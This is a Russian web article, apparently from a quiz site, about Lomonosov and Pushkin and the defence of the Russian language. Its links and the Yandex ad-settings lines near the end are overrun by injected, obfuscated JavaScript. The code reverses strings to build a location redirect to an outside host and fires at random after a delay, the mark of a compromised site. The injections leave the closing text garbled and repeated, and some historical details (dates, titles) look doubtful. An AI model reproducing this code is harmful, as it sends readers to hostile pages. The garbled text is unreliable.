Интересные факты из жизни Ломоносова и Пушкина

Сохранение русского языка трудно переоценить на данный момент. Борьба за его сохранение началась еще во времена Ломоносова и Пушкина.

Всем известно, как мы радеем за русский язык сегодня. Еще в «перестроечные» времена вихрем событий было подорвано единство русского языка, и, как результат, все меньше и меньше бывших Советских Республик, а теперь независимых государств используют его. Сначала он выступал в роли первого родного языка, затем его позиция сместилась в ряды второго государственного, ну а теперь в школах изучают его как иностранный.

Но не каждый знает, что эта борьба началась уже во времена величайшего российского ученого Михаила Васильевича Ломоносова, выдающегося своими работы по филологии, истории, химии, физике, астрономии, геофизики, геологии и минералогии. И в своем послании «Письмо о правилах российского стихотворства», изданного в 1778 года, он выплеснул все негодование по поводу стремления навязать русскому языку неприменимые к нему правила греческого стихосложения и призывал к использованию всех его возможностей, разработав теорию поэтического языка. Наряду с этим в интересные факты из жизни Ломоносова необходимо включить его гений непослушания (по словам академика П.Л. Капицы), который подтолкнул его к созданию научной русской грамматики.

Также, говоря о русском языке, в интересные факты истории можно занести и произведение президента Российской академии наук Александра Семенович Шишкова под названием «Собрание сочинений и переводов», где повествуется о происхождении всех языков мира от русского языка. Правда это или вымысел судить не нам, хотя тот факт, что труд не был ни разу переиздан, дает повод для некоторых выводов.

В любом случае Ломоносов интересные факты из жизни которого представляют собой пример для подражания современной молодежи, выступал в защиту церковнославянской лексики и грамматики, тем самым, встречая недовольство реформатора Николая Михайловича Карамзина, последователем которого стал Александр Сергеевич Пушкин.

Конечно же, необходимо отдать должное и А.С. Пушкину, как создателю русского литературного языка, который нашел ту равнодействующую, примирив со временем взгляды противоборствующих сторон. В интересные факты из жизни Пушкина можно включить то, что, будучи еще отроком и принимая взгляды Карамзина по поводу облегчения слога в пользу французского синтаксиса, он подробно изучал и относился с особым вниманием к церковнославянской лексике (произведения Державина, например). К интересным фактам о Пушкине также можно отнести и то, что в тридцатые годы у Пушкина наступил литературный спад, и проснулась тяга к переводам и изучению языков. И это не случайно, ведь истинно высказывание – «Сколькими языками мы владеем, столько раз мы являемся человеком».

Да, много языков оказывали свое влияние на наш, отсюда и изобилие заимствованных слов и неологизмов. Но ведь тем и интереснее! Например, некоторые занимательные факты, касающиеся русского языка можно найти и у нас на сайте. Например, почитайте различные $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toriny/”>вопросы для викторин, в частности, в разделе $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toriny/novogodnyaya-viktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torina-2009/”>Новогодние Викторины.

Ссылка: $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torina.ru/page/articles/lomonosov-i-pushkin.html”>Интересные факты из жизни Ломоносова и Пушкина


andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_partner_id = 63203;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_site_bg_color = ‘FFFFFF’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_site_charset = ‘utf-8’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_ad_format = ‘direct’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_font_size = 1;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_type = ‘horizontal’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_border_type = ‘block’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_limit = 3;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_header_bg_color = ‘FEEAC7’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_border_color = ‘FBE5C0’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_title_color = ‘0000CC’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_url_color = ‘006600’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_all_color = ‘0000CC’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_text_color = ‘000000’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_hover_color = ‘0066FF’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_favicon = true;
document.write(‘